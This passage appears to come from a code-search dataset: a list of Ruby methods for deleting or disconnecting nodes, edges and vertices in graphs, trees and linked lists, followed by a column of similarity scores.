#{node.osm_id}\"\r\n\r\n #puts \"# this is not needed, but just for sure: record the neighbours' degrees before the shrinkage\"\r\n #v1_deg = v1_nr.degree ; v2_deg = v2_nr.degree\r\n #puts \" -> neighbours degree: v1:#{v1_deg} v2:#{v2_deg}\"\r\n\r\n #puts \"# record the neighbours' OSM/id, for future use\"\r\n #v1_osm = v1_nr.osm_id ; v2_osm = v2_nr.osm_id\r\n #puts \" -> v1_osm: #{v1_osm} deg: #{v1_deg} :: v2_osm #{v2_osm} deg: #{v2_deg}\"\r\n\r\n #puts \"# invalidate the two edges -- particularly, do not output them into Graphviz output\"\r\n e1_nr.invalidate\r\n e2_nr.invalidate\r\n e_distance=e1_nr.time_distance+e2_nr.time_distance\r\n\r\n #puts \" -> invalidated edges - #{e1_nr} #{e1_nr.osm_from}-#{e1_nr.osm_to}(#{e1_nr.is_valid}) #{e2_nr} #{e2_nr.osm_from}-#{e2_nr.osm_to}(#{e2_nr.is_valid})\"\r\n #puts \"# disconnect the triple v1--i--v2, i.e. 
leave out the neighbours from\r\n # the nodes' own neighbours' lists\"\r\n #ns=[] ; v1_nr.neighbours.each do |n| ns << \"#{n.osm_id}\" end; puts \"old v1 neighbours : #{ns}\"\r\n #ns=[] ; v2_nr.neighbours.each do |n| ns << \"#{n.osm_id}\" end; puts \"old v2 neighbours : #{ns}\"\r\n #ns=[] ; node.neighbours.each do |n| ns << \"#{n.osm_id}\" end; puts \"old v neighbours : #{ns}\"\r\n\r\n node.disconnect_neighbour(v1_nr)\r\n node.disconnect_neighbour(v2_nr)\r\n v2_nr.disconnect_neighbour(node)\r\n v1_nr.disconnect_neighbour(node)\r\n node.invalidate\r\n\r\n #puts \"Disconnect edges from nodes\"\r\n #ns=[] ; v1_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \" -> old v1 neighbours : #{ns}\"\r\n #ns=[] ; v2_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \" -> old v2 neighbours : #{ns}\"\r\n v1_nr.disconnect_edge(e1_nr)\r\n v2_nr.disconnect_edge(e2_nr)\r\n\r\n #puts \" # create a new edge going from v1 into v2 (it does not matter in which direction, it is anyway an artificial/virtual edge\"\r\n # save this Edge into the array @edges\r\n v_nr = @vertices.length\r\n e = Edge.new(v1_nr.osm_id, v2_nr.osm_id, 0, v_nr, e1_nr.name, e1_nr.maxspeed, e1_nr.is_oneway, e_distance)\r\n\r\n #puts (\"new edge from #{v1_nr.osm_id} to #{v2_nr.osm_id}\")\r\n @edges.push(e)\r\n\r\n #puts \"#add edge to vertex\"\r\n #ns=[] ; v1_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \"old v1 edges : #{ns}\"\r\n #ns=[] ; v2_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \"old v2 edges : #{ns}\"\r\n v1_nr.add_edge(e)\r\n v2_nr.add_edge(e)\r\n\r\n #add linkeds to vetexes\r\n v1_nr.connect_neighbour(v2_nr)\r\n v2_nr.connect_neighbour(v1_nr)\r\n end\r\n end\r\n end",
"def prune\n # prune trees that aren't duped at all, or are too small\n self.hashes.delete_if { |_,nodes| nodes.size == 1 }\n self.hashes.delete_if { |_,nodes| nodes.all?(&:modified?) }\n\n if option[:liberal] then\n prune_liberally\n else\n prune_conservatively\n end\n end",
"def remove_all\n @peer.remove_all\n# @children.each { |child| scene.unindex_prop(child) } if scene\n# @children = []\n end",
"def clean(node)\n update node, false, true, nil\n end",
"def delete!\n graph.remove_vertex element\n end",
"def delete_node\n node.destroy if node\n end",
"def delete!\n graph.removeVertex element\n end",
"def clean_cached_node(node)\n Puppet::Node.indirection.destroy(node)\n Puppet.info \"#{node}'s cached node removed\"\n end",
"def clear\n @nodes = Hash.new\n @ways = Hash.new\n @relations = Hash.new\n end",
"def filter_out_nodes(nodes_list)\n new_nodes_graph = {}\n @nodes_graph.each do |node_name, node_info|\n next if nodes_list.include?(node_name)\n\n new_nodes_graph[node_name] = node_info.merge(\n connections: node_info[:connections].reject { |connected_hostname, _labels| nodes_list.include?(connected_hostname) },\n includes: node_info[:includes] - nodes_list\n )\n end\n @nodes_graph = new_nodes_graph\n end",
"def clear\n @adjacencies[:in].clear\n @adjacencies[:out].clear\n @vertex = nil\n end",
"def remove\n each { |x| x.parent.children.delete(x) }\n end",
"def remove_vertex(v)\n\t\t@Vertices.delete_at(@Hash[v.label])\n\t\tnum=num_edges-1\n\t\ti=0\n\t\twhile i != num do\n\t\t\tif @Edges[i].points[0] == v.label or @Edges[i].points[1] == v.label\n\t\t\t\t@Edges.delete_at(i)\n\t\t\t\ti=-1\n\t\t\t\tnum=num-1\n\t\t\tend\n\t\t\ti+=1\n\t\tend\n\t\trehash\n\tend",
"def removed(node)\n\t\t\t@size -= 1\n\t\t\treturn node\n\t\tend",
"def delete_old_nodes (days_to_keep = DAYS_TO_KEEP_NODE)\n children.where('updated_at < ?', Time.now - days_to_keep.day).each do |node|\n node.destroy_self_and_children!\n end\n end",
"def remove(vertex)\n return if !self.include?(vertex)\n vertex.remove_relations(self)\n super\n end",
"def remove_edge(e)\n\t\t# Delete an edge\n\t\tfor i in 0..num_edges-1\n\t\t\tif @Edges[i].points[0] == e.points[0] and @Edges[i].points[1] == e.points[1]\n\t\t\t\t@Edges.delete_at(i)\n\t\t\t\tbreak\n\t\t\telsif @Edges[i].points[1] == e.points[0] and @Edges[i].points[0] == e.points[1]\n\t\t\t\t@Edges.delete_at(i)\n\t\t\t\tbreak\n\t\t\tend\n\t\tend\n#\t\trehash\n\tend",
"def remove(x, y)\n @store[x].remove(y)\n @store[y].remove(x) if undirected?\n end",
"def remove_nodes(attr={})\n attr = {\n :threshold => 2,\n :weight => false,\n :dir => :all,\n :type => :plain\n }.merge(attr)\n\n threshold = attr[:threshold]\n weight = attr[:weight]\n dir = attr[:dir]\n plain = (attr[:type] == :plain)\n\n if b=attr[:hirsch]\n weight = :hirsch\n else\n b = 1\n end\n\n testnodes = @nodes\n delnodes = Set.new\n dellinks = Set.new\n\n finished = false\n\n while(!finished)\n ndels = if weight==:hirsch\n case attr[:dir]\n when :in\n testnodes.select { |n| !hirsch?(@destlinks[n],threshold,b) }\n when :out\n testnodes.select { |n| !hirsch?(@sourcelinks[n],threshold,b) }\n when :max\n testnodes.select { |n| !(hirsch?(@destlinks[n],threshold,b) ||\n hirsch?(@sourcelinks[n],threshold,b)) }\n when :min\n testnodes.select { |n| (!hirsch?(@destlinks[n],threshold,b) ||\n !hirsch?(@sourcelinks[n],threshold,b)) }\n else\n testnodes.select { |n| !hirsch?(@destlinks[n] + \n @sourcelinks[n],\n threshold,b) }\n end\n else\n case attr[:dir]\n when :in\n testnodes.select { |n| n_indegree(n,weight) < threshold }\n when :out\n testnodes.select { |n| n_outdegree(n,weight) < threshold }\n when :max\n testnodes.select { |n| ((n_outdegree(n,weight) < threshold) &&\n (n_indegree(n,weight) < threshold)) }\n when :min\n testnodes.select { |n| ((n_outdegree(n,weight) < threshold) ||\n (n_indegree(n,weight) < threshold)) }\n else\n testnodes.select { |n| n_degree(n,weight) < threshold }\n end\n end\n \n delnodes.merge(ndels)\n testnodes = Set.new\n \n ndels.each do |n|\n @sourcelinks[n].each { |l| \n d = l.dest \n testnodes << d\n @destlinks[d].delete(l)\n dellinks << [n,d]\n }\n @destlinks[n].each { |l| \n s = l.src\n testnodes << s\n @sourcelinks[s].delete(l)\n dellinks << [s,n]\n }\n end\n\n testnodes.subtract(delnodes) # is this faster?\n\n finished = plain || testnodes.empty?\n\n end \n\n dellinks.each { |a| @links.delete(a) }\n\n @nodes -= delnodes.to_a\n\n self\n end",
"def delete_node(current_node)\n\nend",
"def delete(rel)\n @relations.delete_if do |x|\n x === rel\n end\n @graph[rel.from].delete(rel.to)\n @graph[rel.to].delete(rel.from) if @undirected\n end",
"def disconnect_via(edge)\n @in_edges.delete(edge)\n @out_edges.delete(edge)\n\n nil\n end",
"def reduce_graph( states )\n @graph.delete_if do |state, neighbours|\n neighbours.delete_if { |neighbour| !states.include?(neighbour) }\n !states.include?(state)\n end\n end",
"def delete_node\n delete(@nodename)\n end",
"def remove_node\n remove_node_helper(@root)\n end",
"def removeAddr( node_id )\n for addr in @routing_table.keys\n if @routing_table[addr][\"node_id\"] == node_id\n @routing_table.delete([addr])\n end\n end\n end",
"def protected_delete_edge!(from, to)\n if has_edge?(from, to)\n @vertices[from].delete(to)\n @edge_labels.delete(Pair.new(from, to))\n end\n end",
"def delete_all\n neo4j_query(\"MATCH (n:`#{mapped_label_name}`) OPTIONAL MATCH (n)-[r]-() DELETE n,r\")\n end",
"def delete(nodeidentifier)\n node = @nodes[nodeidentifier]\n @nodes[nodeidentifier] = nil\n @edges.delete node\n @back_edges.delete node\n end",
"def clear\n\t\t@predecessor = nil\n\t\t@visited = false\n\t\t@node_string = \" \"\n\tend",
"def delete_node(l)\n node = Node.find_by(layer: l).destroy\n Connection.destroy_all(parent_id: node.id)\n Connection.destroy_all(child_id: node.id)\n end",
"def delete_edge(v)\n count = 0\n @edges.each do |e|\n @edges.delete_at(count)if e.vertex.eql?(v)\n count+=1\n end\n end",
"def removeAddr(node_id)\n for addr in @routing_table.keys\n if @routing_table[addr][\"node_id\"] == node_id\n @routing_table.delete([addr])\n end\n end\n end",
"def remove_edge(col, row)\n @deleted << [col, row]\n end",
"def collect_node! #:yields: node\n _clear_cache\n tr = {}\n self.each_node do |node|\n tr[node] = yield node\n end\n # replaces nodes in @pathway.relations\n @pathway.relations.each do |rel|\n rel.node.collect! { |node| tr[node] }\n end\n # re-generates @pathway from relations\n @pathway.to_list\n # adds orphan nodes\n tr.each_value do |newnode|\n @pathway.graph[newnode] ||= {}\n end\n self\n end",
"def remove_nodes!(tg,tiles)\n result = [Array.new,Array.new]\n\n tg[0].each_index {|n| # remove nodes\n tiles.each do |i|\n if i == tg[0][n][0]\n result[0].push(tg[0][n])\n tg[0][n] = nil\n break\n end \n end\n }\n tg[1].each_index {|e| # remove edges\n tiles.each do |i|\n if(tg[1][e][0] == i || tg[1][e][1] == i) \n result[1].push(tg[1][e])\n tg[1][e] = nil\n break # don't add edge twice\n end\n end\n }\n tg[0].compact!\n tg[1].compact!\n return result\nend",
"def remove(node)\n if node.parent.nil?\n @root = nil\n return\n end\n if node.parent.left == node\n node.parent.left = nil\n elsif node.parent.right == node\n node.parent.right = nil\n end\n end",
"def remove_edge(eid)\n p1, p2 = @points_of_edge[eid]\n @points_of_edge[eid] = nil\n @length_of_edge[eid] = nil\n\n @edges_of_point[p1] -= [eid]\n @edges_of_point[p2] -= [eid]\n end",
"def unlink(other)\n self.class.graph.disjoin(vertex, other.vertex)\n end",
"def forget_dependencies_for(item)\n @graph.vertices.each do |v|\n @graph.remove_edge(v, item)\n end\n end",
"def delete_node_improved(node)\n node.val = node.next.val\n node.next = node.next.next\nend",
"def collect_children_to_delete(nodes_to_delete)\n children('id').each do |c|\n nodes_to_delete << c.id\n c.collect_children_to_delete(nodes_to_delete)\n end\n end",
"def delete_this_node(node)\n node.val = node.next_node.val\n node.next_node = node.next_node.next_node\n return node\nend",
"def remove node\n # if the node is at beginning or end of list\n # handle this separately\n return remove_first if node.prev_node == nil\n return remove_last if node.next_node == nil\n\n # tell adjacent nodes to 'skip' over this node\n node.next_node.prev_node = node.prev_node\n node.prev_node.next_node = node.next_node\n\n # store the data, so we can return it\n data = node.data\n\n # send to garbage collector\n node.data = nil\n node = node.prev_node = node.next_node = nil\n\n @size -= 1\n\n return data\n end",
"def create_unvisited_set\n @unvisited_set = @nodes.map { |r| r if @table_merged[r] != \"X\" }\n @unvisited_set.delete(nil)\n @unvisited_set\n end",
"def remove_node\n cspsearchpath.delete(@label)\n end",
"def remove_node(node)\n return if !node_file(node).exist?\n\n txn do\n @repo.rm node_file(node)\n\n message = \"remove node #{node.fqn}\"\n @repo.commit message\n log << \"Database commit: #{message}\"\n end\n end",
"def karger(g)\n if g.nodes.size <= 2\n return g.edges.size\n end\n # pp \"-------------------------\"\n e = g.edges.to_a.at(rand(g.edges.size))\n # pp \"picked edge: \"\n # print_edge e\n # pp \"left edges size: #{g.edges.size}\"\n n1 = e.nodes.to_a[0]\n n2 = e.nodes.to_a[1]\n # print_edge e\n # print_node n1\n # print_node n2\n n1.edges.merge(n2.edges)\n # print_node n1\n n1.edges.delete(e)\n g.edges.delete(e)\n edges_to_be_deleted = []\n n1.edges.to_a.each do |e|\n if e.nodes.include?(n2)\n e.nodes.delete(n2)\n e.nodes.add(n1)\n end\n if e.nodes.size < 2\n edges_to_be_deleted << e\n end\n end\n # puts \"before purge:\"\n # print_node n1\n edges_to_be_deleted.each do |e|\n n1.edges.delete e\n g.edges.delete e\n end\n # puts \"after adjust node: \"\n # print_node n1\n g.nodes.delete(n2.index)\n karger(g)\nend",
"def remove_from_tree(item, node) \n return rebalance(super(item, node))\n end",
"def remove_edge(u, v)\n super\n @weights.delete([u,v])\n end",
"def prune_conservatively\n hashes_to_prune = {}\n\n # extract all subtree hashes from all nodes\n self.hashes.values.each do |nodes|\n nodes.first.all_structural_subhashes.each do |h|\n hashes_to_prune[h] = true\n end\n end\n\n # nuke subtrees so we show the biggest matching tree possible\n self.hashes.delete_if { |h,_| hashes_to_prune[h] }\n end",
"def on_remove\n @context.notifications.off(\"graph.start\", self)\n @context.notifications.off(\"graph.stop\", self)\n\n io.outputs.each { |k, o| @context.connections.delete(o.guid) }\n io.unregister_inputs\n var.unregister\n stop\n end",
"def destroy\n @node = Node.find(params[:id])\n @node.destroy\n project = Project.where(:user_id => current_user[:id]).first\n project.optimized = false\n project.loading = false\n project.save\n @nodes = Node.where(:user_id => current_user[:id])\n @nodes.each do |node|\n node.jobnumber = nil\n node.vehicle_id = nil\n node.servicetime = nil\n node.tour_id = nil\n node.save\n end\n respond_to do |format|\n format.html { redirect_to(nodes_url) }\n format.xml { head :ok }\n end\n end",
"def disconnect node1, node2\n if !nodes.include?(node1) || !nodes.include?(node2)\n raise NodeContainsException, 'The graph does not contain either ' + node1 + ' or ' + node2\n end\n @connections[node1].delete node2\n @connections[node2].delete node1\n end",
"def merge_with(node)\n raise \"Cannot merge a node with itself!\" if node == self\n @in.delete(node)\n @out.delete(node)\n node.in.each do |n|\n n.out.map! { |o| o == node ? self : o }\n end\n @out.add_all(node.out)\n @graph.start = self if @graph.start == node\n @graph.remove(node)\n end",
"def reverse_delete(result)\n edges = result[0]\n hitList = result[1]\n\n hitList.each do |k, dist|\n edges[k[0]].delete(k[-1])\n edges[k[-1]].delete(k[0])\n\n unless path_exists?(edges, k[0], k[-1]) #check if connection still path\n p \"path does not exist, reconnecting #{k[0]} to #{k[-1]} \"\n edges[k[0]][k[-1]] = dist\n edges[k[-1]][k[0]] = dist\n end\n end\n\n edges\n end",
"def remove_vertex!(vertex)\n return nil unless vertex?(vertex)\n @vertices[vertex].edges.each { |edge| remove_edge!(edge) }\n @edges -= @vertices[vertex].edges\n @vertices[vertex].clear\n @vertices.delete(vertex)\n end",
"def delete_edge(from_vertex, to_vertex)\n begin\n self[from_vertex].out_edges.delete(to_vertex)\n self[to_vertex].in_edges.delete(from_vertex)\n rescue NoMethodError => e\n err_suffix = \"in delete_edge(#{from_vertex}, #{to_vertex}).\"\n if self[from_vertex].nil?\n puts(\"No vertex with id #{from_vertex} \" << err_suffix)\n else\n puts(\"No vertex with id #{to_vertex} \" << err_suffix)\n end \n end\n end",
"def LinksToRemove\n\t\t\n\t\t#removing unwanted links\n\t\t@nodes.each do |nodeA|\n\t\t\t@nodes.each do |nodeB|\n\n\t\t\t\tif nodeA==nodeB\n\t\t\t\t\tnext\n\t\t\t\tend\n\n\t\t\t\ttempLink=Link.new(nodeA,nodeB)\n\t\t\t\trevTempLink=Link.new(nodeB,nodeA)\n\n\t\t\t\t#check if this link has been requested\n\t\t \t\treqLink=false \n\t\t \t\t@links.each do |link|\n\t\t\t \t\tif Equals(tempLink, link)\n\t\t\t \t\t\treqLink=true\n\t\t\t \t\tend\n\t\t \t\tend\n\t\t \n\t\t \t\tif not reqLink and (nodeA.type==\"R\" and nodeB.type==\"R\")\n\t\t\t\t\tputs(\"Removing link between node #{nodeA.id} and #{nodeB.id}\\n\")\n\t\t\t\t\t@killedLinks << tempLink\n\t\t \t\tend\n\n\n\t\t\tend\n\t\tend \n\n\t\treturn @killedLinks\n\n\tend",
"def clear_node\n self.value = nil\n self.left_child = nil\n self.right_child = nil\n end"
] |
[
"0.7532265",
"0.70715094",
"0.70563966",
"0.69391334",
"0.69204074",
"0.6869052",
"0.67679524",
"0.6723454",
"0.6667144",
"0.66671157",
"0.6653908",
"0.6612068",
"0.66102505",
"0.6605932",
"0.65623885",
"0.6544049",
"0.6544049",
"0.6488497",
"0.6462139",
"0.6447844",
"0.64476967",
"0.6432469",
"0.63991106",
"0.6398748",
"0.6363964",
"0.6356087",
"0.6337634",
"0.63222283",
"0.6321797",
"0.62989736",
"0.62811285",
"0.6275145",
"0.62732744",
"0.6271137",
"0.62633497",
"0.62451637",
"0.6237287",
"0.622459",
"0.62226546",
"0.6215864",
"0.6212267",
"0.6208622",
"0.62085897",
"0.6204139",
"0.6195986",
"0.6193758",
"0.6174084",
"0.6173676",
"0.6161887",
"0.61611694",
"0.6139803",
"0.6129755",
"0.6117151",
"0.611002",
"0.6090646",
"0.60773224",
"0.60743326",
"0.60632354",
"0.6037756",
"0.6017959",
"0.600252",
"0.60025054",
"0.59990066",
"0.5995176",
"0.5991342",
"0.5983294",
"0.5982925",
"0.5979202",
"0.5970241",
"0.5962269",
"0.59564316",
"0.59505546",
"0.5948514",
"0.5944791",
"0.5930039",
"0.5929553",
"0.5918265",
"0.59081703",
"0.589476",
"0.5890514",
"0.5885892",
"0.587494",
"0.5862603",
"0.5856659",
"0.58554363",
"0.5853729",
"0.5836945",
"0.5816846",
"0.5812647",
"0.58049655",
"0.57891",
"0.57792264",
"0.5774953",
"0.57658666",
"0.5765664",
"0.5764324",
"0.5756609",
"0.5751132",
"0.57427627",
"0.57415134"
] |
0.72997206
|
1
|
First assign nodes to workers, and then count the seconds off each worker
|
def process_second
@seconds += 1
assign_nodes
process_workers
end
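A minimal self-contained sketch of how this per-second tick could be wired up. Only process_second above comes from the source; the Scheduler class, Worker struct, node queue, and the fixed per-node cost are all assumptions made for illustration:

class Scheduler
  Worker = Struct.new(:node, :seconds_left) do
    def idle?
      node.nil?
    end

    def tick
      return if idle?
      self.seconds_left -= 1
      self.node = nil if seconds_left <= 0 # node finished; worker goes idle
    end
  end

  def initialize(nodes, worker_count)
    @nodes = nodes # queue of pending nodes (assumed input)
    @workers = Array.new(worker_count) { Worker.new(nil, 0) }
    @seconds = 0
  end

  def process_second
    @seconds += 1
    assign_nodes
    process_workers
  end

  private

  # Hand pending nodes to idle workers, in queue order.
  def assign_nodes
    @workers.select(&:idle?).each do |w|
      break if @nodes.empty?
      w.node = @nodes.shift
      w.seconds_left = 1 # placeholder cost; the real per-node cost is not given
    end
  end

  # Count one second off every busy worker.
  def process_workers
    @workers.each(&:tick)
  end
end

For example, Scheduler.new(%w[a b c], 2).process_second advances the clock one second: it first assigns nodes to the two workers, then ticks each of them.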
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def workers(count); end",
"def worker_count\n @action == 'run' ? 1 : workers\n end",
"def active_on_cluster_count\n (waiting_count + running_count)\n end",
"def worker_count()\n @workers.size\n end",
"def worker_count()\n @workers.size\n end",
"def missing_workers\n @options[:process_count] - @workers.length\n end",
"def workers\r\n @workers ||= []\r\n end",
"def worker_number=(worker_num); end",
"def excess_task_workers\n @task_worker_lock.synchronize do\n @task_worker_size - @task_workers.size - @spawnings\n end\n end",
"def concurrent_count\n debug(\"Getting puppet status\")\n\n running = 0\n\n @puppet.status do |resp|\n begin\n running += resp[:body][:data][:running].to_i\n rescue Exception => e\n debug(\"Failed to get node status: #{e}, continuing\")\n end\n end\n\n running\nend",
"def workers\n @@workers ||= []\n end",
"def assign_node(char)\n assigned = false\n @worker_obj.each do |k, node|\n break if assigned\n unless node\n @worker_obj[k] = [char, NUM_TO_INT_MAP[char] + ADDITIONAL_SECONDS]\n @nodes_being_worked_on << char\n assigned = true\n end\n end\n end",
"def compute_workers(ncpus)\n return 0 unless Process.respond_to?(:fork)\n\n compute_workers_from_env(LISTENER_WORKERS) ||\n compute_workers_from_env(PUMA_WORKERS) ||\n ncpus * PUMA_WORKERS_CPUMULT\n end",
"def thread_count\n @worker_threads_count.value\n end",
"def busy_workers\n if @threadsafe\n 0\n else\n @workers.size - @worker_queue.size\n end\n end",
"def method()\n @workers.size\n end",
"def workers_to_start(workers_to_start)\n if not worker_pids.empty?\n worker_pids.each do |worker_pid|\n if worker_alive?(worker_pid)\n @number_of_workers += 1\n workers_to_start -= 1\n else\n mark_worker_as_stopped(worker_pid)\n end\n return 0 if workers_to_start < 1\n end\n end\n return workers_to_start\n end",
"def worker_threads\n @workers.synchronize { @workers.size }\n end",
"def get_njobs(nodes)\n\n # Reset job count on each input node\n nodes.each do |wn|\n wn[:njobs] = -1\n end\n\n begin\n pbsnodes_xml = REXML::Document.new( %x[ #{$cmd_pbsnodes} 2> /dev/null ] )\n rescue\n return\n end\n\n return if pbsnodes_xml.elements.empty?\n\n pbsnodes_xml.elements.each('//Data/Node') do |node_xml|\n\n name = node_xml.elements['name'].text\n is_offline = node_xml.elements['state'].text.include?('offline')\n is_down = node_xml.elements['state'].text.include?('down')\n\n jobs_xml = node_xml.elements['jobs']\n if jobs_xml\n njobs = jobs_xml.text.split(' ').length\n else\n njobs = 0\n end\n\n # Find matching input nodes: FQDN must be set, node must be up and offline\n nodes.each do |wn|\n next unless wn[:fqdn] and wn[:fqdn] == name and is_offline and !is_down\n wn[:njobs] = njobs\n end\n\n end\n\nend",
"def worker_check_interval(interval); end",
"def murder_lazy_workers\n next_sleep = @timeout - 1\n now = Time.now.to_i\n WORKERS.dup.each_pair do |wpid, worker|\n tick = worker.tick\n 0 == tick and next # skip workers that haven't processed any clients\n diff = now - tick\n tmp = @timeout - diff\n if tmp >= 0\n next_sleep > tmp and next_sleep = tmp\n next\n end\n next_sleep = 0\n logger.error \"worker=#{worker.number} PID:#{wpid} timeout \" \\\n \"(#{diff}s > #{@timeout}s), killing\"\n kill_worker(:KILL, wpid) # take no prisoners for timeout violations\n end\n next_sleep <= 0 ? 1 : next_sleep\n end",
"def murder_lazy_workers\n next_sleep = @timeout - 1\n now = Time.now.to_i\n WORKERS.dup.each_pair do |wpid, worker|\n tick = worker.tick\n 0 == tick and next # skip workers that haven't processed any clients\n diff = now - tick\n tmp = @timeout - diff\n if tmp >= 0\n next_sleep > tmp and next_sleep = tmp\n next\n end\n next_sleep = 0\n logger.error \"worker=#{worker.nr} PID:#{wpid} timeout \" \\\n \"(#{diff}s > #{@timeout}s), killing\"\n kill_worker(:KILL, wpid) # take no prisoners for timeout violations\n end\n next_sleep <= 0 ? 1 : next_sleep\n end",
"def calc_final_desired_workers\n required_workers = 0\n @worksets.each do |workset|\n required_workers += workset[0] if workset && workset[0]\n end\n required_workers = [required_workers, @max_workers].min\n required_workers = [required_workers, @min_workers].max\n required_workers\n end",
"def worker_pool; end",
"def worker_pool; end",
"def spawn_and_monitor_workers\n daemon_log :msg => \"Spawning #{$daemon[:worker_count]} workers...\"\n\n while $daemon[:work]\n daemon_update_heartbeat\n\n # (Re)start workers\n while $daemon[:worker_pids].count < $daemon[:worker_count] do\n sp = Spawnling.new(:argv => $worker[:process_prefix]) do\n worker_runner\n end\n $daemon[:worker_pids] << sp.handle\n end\n\n sleep $daemon[:monitoring_sleep]\n\n # Delete PIDs from the array child_pids which don't exists anymore\n $daemon[:worker_pids].each do |ch_pid|\n begin\n ps = ProcTable.ps(ch_pid)\n rescue\n ps = nil\n daemon_log :msg => \"Error in ProcTable.ps: #{$!}\", :sev => :error\n end\n $daemon[:worker_pids].delete ch_pid unless ps && ps.comm == 'ruby'\n end\n end\nend",
"def log_nodes_count\n @max_nodes += 1\n end",
"def total_capacity_job_nodes_cpu\n cpus = job_nodes.map {|n| n['status']['capacity']['cpu'].to_i}\n cpus.inject {|sum,n| sum + n}\n end",
"def num_waiting\n end",
"def num_waiting\n end",
"def worker_timeout(timeout); end",
"def tasks_finished_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_finished_count\n end\n end",
"def tasks_finished_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_finished_count\n end\n end",
"def setup\n logger.info 'setup workers'\n\n setup_refresh_timer\n setup_analyze_timer\n end",
"def total_allocatable_job_nodes_cpu\n cpus = job_nodes.map {|n| n['status']['allocatable']['cpu'].to_i}\n cpus.inject {|sum,n| sum + n}\n end",
"def concurrent_workers(*args)\n 1\n end",
"def check_for_available_workers\n workers >= working_count\n end",
"def running_workers\n pool_manager.workers.fetch(queues, {})\n end",
"def njobs\n @pool.njobs\n end",
"def worker_pool_size; end",
"def poll_cycle\n\n puts \"---------------------\"\n puts \"#{host}\"\n puts \"---------------------\"\n data = twemproxy_data()\n\n summary_ejections = 0\n summary_client_connections = 0\n summary_requests = 0\n summary_server_connections = 0\n summary_server_errors = 0\n summary_in_queue = 0\n summary_out_queue = 0\n summary_servers = 0\n data.keys.find_all{|k| data[k].is_a?(Hash)}.each do |pool|\n summary_client_connections += metric_total(\"client connections/#{pool}\", data[pool]['client_connections'], \"connections\")\n summary_ejections += metric_total(\"server ejections/#{pool}\", data[pool]['server_ejects'], \"ejects\")\n\n data[pool].keys.find_all{|k| data[pool][k].is_a?(Hash)}.each do |server|\n summary_servers += 1\n summary_requests += metric_value(\"server requests/#{pool}/#{server}\", data[pool][server]['requests'], \"requests\")\n summary_server_connections += metric_total(\"server connections/#{pool}/#{server}\", data[pool][server]['server_connections'], \"connections\")\n summary_server_errors += metric_value(\"server errors/#{pool}/#{server}\", data[pool][server]['server_err'], \"errors\")\n summary_in_queue += metric_total(\"in queue/#{pool}/#{server}\", data[pool][server]['in_queue'], \"ops\")\n summary_out_queue += metric_total(\"out queue/#{pool}/#{server}\", data[pool][server]['out_queue'], \"ops\")\n metric_value(\"request bytes/#{pool}/#{server}\", data[pool][server]['request_bytes'], \"bytes\")\n metric_value(\"response bytes/#{pool}/#{server}\", data[pool][server]['response_bytes'], \"bytes\")\n end\n end\n\n metric_total \"total ejections\", summary_ejections, \"ejects\"\n metric_total \"total client connections\", summary_client_connections, \"connections\"\n metric_total \"total server requests\", summary_requests, \"requests\"\n metric_total \"total server connections\", summary_server_connections, \"connections\"\n metric_total \"total server errors\", summary_server_errors, \"errors\"\n metric_total \"total in queue\", summary_in_queue, \"ops\"\n metric_total \"total out queue\", summary_out_queue, \"ops\"\n metric_total \"total servers\", summary_servers, \"servers\"\n metric_total \"percent up\", (((summary_servers - summary_ejections) / summary_servers) * 100.0), \"%\"\n end",
"def adjust_workers\n\t\tself.sample_queue_status\n\n\t\treturn nil if self.throttled?\n\n\t\tif self.needs_a_worker?\n\t\t\tself.log.info \"Too few workers for (%s); spinning one up.\" % [ self.task_class.name ]\n\t\t\tpid = self.start_worker( !self.workers.empty? )\n\t\t\treturn [ pid ]\n\t\tend\n\n\t\treturn nil\n\trescue Timeout::Error => err\n\t\tself.log.warn \"%p while adjusting workers: %s\" % [ err.class, err.message ]\n\t\treturn nil\n\tend",
"def size_without_waiters\n clients.inject(0) do |sum, element|\n sum += 1 unless element.waiting?\n sum\n end\n end",
"def update_workers\n mongo_driver = Kymera::MongoDriver.new(address, port, database, 'workers')\n @registered_workers = mongo_driver.get_collection('workers')\n end",
"def run(interval, concurrency)\n @puppet.reset\n\n log(\"Doing discovery start of run\")\n Timeout::timeout(5) {\n @clients = @puppet.discover :verbose => false\n }\n log(\"Discovered #{@puppet.discover.size} nodes\")\n\n unless @clients.nil? or @clients.size == 0\n sleeptime = interval * 60 / @clients.size\n\n log(\"Found #{@clients.size} puppet nodes, sleeping for ~#{sleeptime} seconds between runs\")\n\n if @config[:randomize]\n @clients = @clients.sort_by { rand }\n else\n @clients.sort!\n end\n\n @clients.each do |client|\n starttime = Time.now.to_i\n\n begin\n cur_concurrency = concurrent_count\n log(\"Current puppetd's running: #{cur_concurrency}\")\n\n if concurrency\n if cur_concurrency < concurrency\n run_client(client)\n else\n log(\"Puppet run for client #{client} skipped due to current concurrency of #{cur_concurrency}\")\n end\n else\n run_client(client)\n end\n rescue Exception => e\n log(\"Runner raised an exception for client #{client}: #{e}\")\n log(e)\n ensure\n sleeptime = (interval * 60 / @clients.size) - (Time.now.to_i - starttime)\n log(\"Sleeping for #{sleeptime} seconds\")\n\n sleep(sleeptime > 0 ? sleeptime : 1)\n end\n end\n else\n log(\"No Puppet clients found.\")\n end\nend",
"def set_workers(app_name, qty)\n deprecate # 07/31/2012\n put(\"/apps/#{app_name}/workers\", :workers => qty).to_s\n end",
